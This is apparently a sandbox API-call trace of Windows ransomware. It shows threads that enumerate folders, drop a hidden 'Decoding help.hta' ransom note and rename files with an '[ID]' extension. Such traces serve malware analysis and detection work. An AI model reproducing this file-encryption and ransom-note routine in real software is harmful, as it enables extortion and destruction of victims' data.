lpFindFileData=0xf70fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e1ecc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e1ecc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e1ecc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0048.430] FindClose (in: hFindFile=0x6711f0 | out: hFindFile=0x6711f0) returned 1 Thread: id = 556 os_tid = 0xcf4 [0048.419] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\*.*", lpFindFileData=0x16a9fd30 | out: lpFindFileData=0x16a9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfc64e30, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0xfc64e30, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db338 [0048.419] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0048.419] FindNextFileW (in: hFindFile=0x5db338, lpFindFileData=0x16a9fd30 | out: lpFindFileData=0x16a9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfc64e30, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0xfc64e30, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.419] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.420] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.420] FindNextFileW (in: hFindFile=0x5db338, lpFindFileData=0x16a9fd30 | out: lpFindFileData=0x16a9fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xecb35800, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xecb35800, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xbddb7d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x85000, dwReserved0=0x0, dwReserved1=0x0, cFileName="RacDatabase.sdf", cAlternateFileName="RACDAT~1.SDF")) returned 1 [0048.420] lstrcpyW (in: lpString1=0x33fa320, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\*.*" [0048.420] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\*.*") returned 46 [0048.420] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\Decoding help.hta" [0048.420] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\decoding help.hta")) returned 0xffffffff [0048.420] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x718 [0050.361] WriteFile (in: hFile=0x718, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x16a9fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x16a9fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0051.667] CloseHandle (hObject=0x718) returned 1 [0052.159] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0056.711] lstrcmpiW (lpString1="Decoding help.hta", lpString2="RacDatabase.sdf") returned -1 [0056.711] lstrlenW (lpString="RacDatabase.sdf") returned 15 [0056.711] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\*.*" [0056.711] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\*.*") returned 46 [0056.711] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\", lpString2="RacDatabase.sdf" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" [0056.711] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" [0056.711] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.[ID]g9uZrLhJaygpwRm1[ID]" [0056.711] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racdatabase.sdf"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racdatabase.sdf.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.711] FindNextFileW (in: hFindFile=0x5db338, lpFindFileData=0x16a9fd30 | out: lpFindFileData=0x16a9fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0x1dddd970, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0x0, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0056.711] lstrcpyW (in: lpString1=0x33fa320, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\*.*" [0056.711] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\*.*") returned 46 [0056.711] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\Decoding help.hta" [0056.711] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\decoding help.hta")) returned 0x1 [0056.711] FindNextFileW (in: hFindFile=0x5db338, lpFindFileData=0x16a9fd30 | out: lpFindFileData=0x16a9fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0x1dddd970, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0x0, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 0 [0056.712] FindClose (in: hFindFile=0x5db338 | out: hFindFile=0x5db338) returned 1 Thread: id = 557 os_tid = 0xcf8 [0048.429] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\*.*", lpFindFileData=0xf24fd30 | out: lpFindFileData=0xf24fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd49670, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0xfd49670, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db7f8 [0048.429] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0048.429] FindNextFileW (in: hFindFile=0x5db7f8, lpFindFileData=0xf24fd30 | out: lpFindFileData=0xf24fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd49670, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0xfd49670, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.429] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.429] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.429] FindNextFileW (in: hFindFile=0x5db7f8, lpFindFileData=0xf24fd30 | out: lpFindFileData=0xf24fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfd23510, ftCreationTime.dwHighDateTime=0x1d526b8, ftLastAccessTime.dwLowDateTime=0xfd23510, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0xfd23510, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0x0, dwReserved1=0x0, cFileName="sql2D37.tmp", cAlternateFileName="")) returned 1 [0048.429] lstrcpyW (in: lpString1=0x3402328, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\*.*" [0048.429] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\*.*") returned 41 [0048.429] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\Decoding help.hta" [0048.429] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\rac\\temp\\decoding help.hta")) returned 0xffffffff [0048.429] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\rac\\temp\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x498 [0050.379] WriteFile (in: hFile=0x498, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xf24fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xf24fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0052.375] CloseHandle (hObject=0x498) returned 1 [0055.320] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.209] lstrcmpiW (lpString1="Decoding help.hta", lpString2="sql2D37.tmp") returned -1 [0058.209] lstrlenW (lpString="sql2D37.tmp") returned 11 [0058.209] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\*.*" [0058.209] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\*.*") returned 41 [0058.209] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\", lpString2="sql2D37.tmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\sql2D37.tmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\sql2D37.tmp" [0058.209] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\sql2D37.tmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\sql2D37.tmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\sql2D37.tmp" [0058.209] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\sql2D37.tmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\sql2D37.tmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\sql2D37.tmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.209] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\sql2D37.tmp" (normalized: "c:\\programdata\\microsoft\\rac\\temp\\sql2d37.tmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\sql2D37.tmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\rac\\temp\\sql2d37.tmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.209] FindNextFileW (in: hFindFile=0x5db7f8, lpFindFileData=0xf24fd30 | out: lpFindFileData=0xf24fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfd49670, ftCreationTime.dwHighDateTime=0x1d526b8, ftLastAccessTime.dwLowDateTime=0xfd49670, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0xfd49670, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0x0, dwReserved1=0x0, cFileName="sql2D47.tmp", cAlternateFileName="")) returned 1 [0058.209] lstrcpyW (in: lpString1=0x3402328, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\*.*" [0058.209] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\*.*") returned 41 [0058.209] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\Decoding help.hta" [0058.209] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\rac\\temp\\decoding help.hta")) returned 0x1 [0059.147] lstrcmpiW (lpString1="Decoding help.hta", lpString2="sql2D47.tmp") returned -1 [0059.147] lstrlenW (lpString="sql2D47.tmp") returned 11 [0059.147] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\*.*" [0059.147] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\*.*") returned 41 [0059.147] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\", lpString2="sql2D47.tmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\sql2D47.tmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\sql2D47.tmp" [0059.148] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\sql2D47.tmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\sql2D47.tmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\sql2D47.tmp" [0059.148] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\sql2D47.tmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\sql2D47.tmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\sql2D47.tmp.[ID]g9uZrLhJaygpwRm1[ID]" [0059.148] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\sql2D47.tmp" (normalized: "c:\\programdata\\microsoft\\rac\\temp\\sql2d47.tmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\sql2D47.tmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\rac\\temp\\sql2d47.tmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.802] FindNextFileW (in: hFindFile=0x5db7f8, lpFindFileData=0xf24fd30 | out: lpFindFileData=0xf24fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfd49670, ftCreationTime.dwHighDateTime=0x1d526b8, ftLastAccessTime.dwLowDateTime=0xfd49670, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0xfd49670, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0x0, dwReserved1=0x0, cFileName="sql2D47.tmp", cAlternateFileName="")) returned 0 [0060.802] FindClose (in: hFindFile=0x5db7f8 | out: hFindFile=0x5db7f8) returned 1 Thread: id = 558 os_tid = 0xcfc [0048.439] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\*.*", lpFindFileData=0x7b4fd30 | out: lpFindFileData=0x7b4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8810 [0048.439] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0048.439] FindNextFileW (in: hFindFile=0x5d8810, lpFindFileData=0x7b4fd30 | out: lpFindFileData=0x7b4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.439] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.439] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.439] FindNextFileW (in: hFindFile=0x5d8810, lpFindFileData=0x7b4fd30 | out: lpFindFileData=0x7b4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="x64", cAlternateFileName="")) returned 1 [0048.439] lstrcmpW (lpString1=".", lpString2="x64") returned -1 [0048.439] lstrcmpW (lpString1="..", lpString2="x64") returned -1 [0048.439] lstrcmpiW (lpString1="windows", lpString2="x64") returned -1 [0048.439] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\*.*" [0048.439] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\*.*") returned 92 [0048.439] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\", lpString2="x64" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64") returned="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64" [0048.440] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*.*" [0048.440] GlobalMemoryStatus (in: lpBuffer=0x7b4fd10 | out: lpBuffer=0x7b4fd10) [0048.440] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5c48250, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x69c [0048.451] CloseHandle (hObject=0x69c) returned 1 [0048.451] FindNextFileW (in: hFindFile=0x5d8810, lpFindFileData=0x7b4fd30 | out: lpFindFileData=0x7b4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="x64", cAlternateFileName="")) returned 0 [0048.451] FindClose (in: hFindFile=0x5d8810 | out: hFindFile=0x5d8810) returned 1 Thread: id = 559 os_tid = 0xd00 [0048.451] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*", lpFindFileData=0xfd8fd30 | out: lpFindFileData=0xfd8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x974da2e9, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x974da2e9, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d87d0 [0049.303] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.303] FindNextFileW (in: hFindFile=0x5d87d0, lpFindFileData=0xfd8fd30 | out: lpFindFileData=0xfd8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x974da2e9, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x974da2e9, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.303] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.303] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.303] FindNextFileW (in: hFindFile=0x5d87d0, lpFindFileData=0xfd8fd30 | out: lpFindFileData=0xfd8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa981eb4a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa981eb4a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa981eb4a, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x92000, dwReserved0=0x0, dwReserved1=0x0, cFileName="PresentationBuildTasks.dll", cAlternateFileName="")) returned 1 [0049.646] lstrcpyW (in: lpString1=0x10fc4d88, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0049.646] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0049.646] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0049.646] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0xffffffff [0049.646] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0050.881] WriteFile (in: hFile=0x438, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xfd8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xfd8fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0051.644] CloseHandle (hObject=0x438) returned 1 [0052.157] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference 